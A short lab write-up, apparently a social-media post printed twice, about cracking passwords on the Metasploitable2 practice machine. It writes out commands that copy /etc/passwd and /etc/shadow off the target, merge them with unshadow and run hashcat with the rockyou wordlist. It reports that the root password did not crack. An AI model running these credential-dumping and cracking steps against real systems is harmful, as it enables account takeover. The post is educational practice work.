🔹 Objective:
Learn and apply the end-to-end process of password cracking on Metasploitable2.
🔹 Steps Taken:
``
1. Dump shadow and passwd files
scp msfadmin@:/etc/passwd ./passwd
scp msfadmin@:/etc/shadow ./shadow
2. Combine them into a hash file
unshadow passwd shadow > combined.txt
3. Run Hashcat against the hashes
hashcat -m 500 -a 0 combined.txt /usr/share/wordlists/rockyou.txt
``
🔹 Outcome:
Extracted hashes successfully.
Attempted cracking with Hashcat.
Root password did not crack with the default wordlist.
🔹 Lessons Learned:
Password cracking requires strong wordlists and sometimes brute-force.
The workflow matters more than the result.
Defenders should always enforce strong passwords and modern hashing algorithms.
💡 Next Steps:
Experiment with custom wordlists.
Try brute-force methods.
Move to the next Red Teaming challenge (DVWA SQL injection).
More...
Learn and apply the end-to-end process of password cracking on Metasploitable2.
🔹 Steps Taken:
``
1. Dump shadow and passwd files
scp msfadmin@:/etc/passwd ./passwd
scp msfadmin@:/etc/shadow ./shadow
2. Combine them into a hash file
unshadow passwd shadow > combined.txt
3. Run Hashcat against the hashes
hashcat -m 500 -a 0 combined.txt /usr/share/wordlists/rockyou.txt
``
🔹 Outcome:
Extracted hashes successfully.
Attempted cracking with Hashcat.
Root password did not crack with the default wordlist.
🔹 Lessons Learned:
Password cracking requires strong wordlists and sometimes brute-force.
The workflow matters more than the result.
Defenders should always enforce strong passwords and modern hashing algorithms.
💡 Next Steps:
Experiment with custom wordlists.
Try brute-force methods.
Move to the next Red Teaming challenge (DVWA SQL injection).
More...